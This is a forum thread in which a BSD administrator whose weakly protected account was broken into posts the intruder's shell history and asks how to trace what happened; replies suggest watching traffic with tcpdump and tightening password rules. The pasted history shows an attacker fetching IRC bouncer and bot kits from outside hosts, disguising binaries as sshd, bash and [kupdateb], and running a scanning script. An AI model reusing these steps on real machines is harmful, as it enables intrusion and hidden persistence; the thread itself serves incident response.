|
|||
weak password=broken
I just found out that a user had a weak password and it was broken. How do i trace what a user been doing?
Only see brief info in .bash_history (below) Any help at all is welcome, ive changed password and deleted the 2 directorys ive found. Not a single hit on robotbsd in google makes me a bit worried. Code:
ls ps 'ux uname uname -a uptime wget w passwd ls uname -a fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz wget wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz ls tar xvf psyBNC-2.3.2-7.tar.gz tar xzvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls ls pico menuconf pico config.h ls pico psybncchk ls pico CHANGES make ls pico psybnc.conf ls rm -rf salt.h mv psybnc sshd export PATH="." sshd ps -ux ls exit ps-ux ps -ux ls kill -9 29089 ps -ux kill -9 28097 ps -ux ls cd psybnc ls pico psybnc.conf ls sshd export PATH="." sshd ps -ux ls exit ls -ps -ux ls ps -ux ls kill -9 12813 ls ps -ux ls cd psybnc ls mv sshd bash ./bash ps -ux kill -9 12169 ls cd .. ls wget badry.uv.ro/robotlinux.tgz ls tar xvf robotlinux.tgz cd ". .".l ls pico mech.set ./[kupdateb] [kupdateb] export PATH="." [kupdateb] ls exit ls ls -a cd /var/tmp mkdir roxy cd roxy/ ls ls -a wget badry.uv.ro/robotbsd.tgz ls tar xvf robotbsd.tgz ls cd ". .".b ls ls pico m.session ls ./[kupdateb] chmod +x * ls [kupdateb] ./ [kupdateb] ls cd .. ls ls exit ls ps -ux cd psybnc ls cd .. ls rm -rf psybnc ls tar xvf psyBNC-2.3.2-7.tar.gz tar xzvf psyBNC-2.3.2-7.tar.gz ls cd psybnc ls make ls mv psybnc bash ./bash ps -ux ls w uname -a uptime exit ls ps -ux ls -a exit ps -ux uname -a uptime ls -a ls -a exit ps -ux uname -a ls -a cd ". .".l ls ./[kupdateb] ls cd /var/tmp ls ls wget badry.uv.ro/robotbsd.tgz ls tar xvf robotbsd.tgz ls cd ". .".b ls ./[kupdateb] ls ps -ux uname -a uptime ls cd .. ls ls wget bucus.tvn.hu/wtf.tgz ls ftp tar xvf wtf.tgz ls cd wtf ls ./a 21.21 rm -rf a1 rm -rf scam ./a 53.21 exit |
|
||||
On the simple side, using ...
tcpdump and/or pftop (if installed) you can "watch" your box's actual network traffic to see who's NOW talking to you and with whom your talking to. If you cannot account for the sessions you see, then you are OPERATING as compromised host. The very nature of an IM/IRC "bot" would suggest that you're going to see lots and lots of sessions. In the bash history, where you see Code:
./a 21.21 /S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience. |
|
|||
The Hungarian link is still functional, so go get wtf.tgz. It's a real script kiddy's toolkit. There's even word dictionaries. It also has the a shell script that was copied to the compromised account's directory. It may help you trace any changes made.
For the next time (I truly hope there won't be any), please enforce strict password policies, like setting minimum length, with both low and uppercase alphanumeric sets. And check the handbook, part III (System Administration), especially chapters 13 to 17. There are many good security tips.
__________________
May the source be with you! Last edited by Beastie; 1st July 2009 at 06:11 PM. |
|
|||
What handbook Beastie? aren't you a little lost?
|
|
|||
Ah sorry for that. I KNEW I was in the OpenBSD section and yet I was still thinking about the FreeBSD handbook.
However, most topics there are common to both systems (and many others), some are general tips that can apply to any situation and some provide general information about the use and configuration of third-party software or software common to both systems.
__________________
May the source be with you! |
|
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
A failure in password security | TerryP | Off-Topic | 3 | 25th September 2008 03:19 AM |
Set password for Folder | mfaridi | FreeBSD Security | 6 | 5th September 2008 10:49 PM |
Anyone Install Password Gorilla | revzalot | OpenBSD Installation and Upgrading | 3 | 26th August 2008 03:58 AM |
root password is blank | mfaridi | FreeBSD Security | 10 | 16th May 2008 10:19 PM |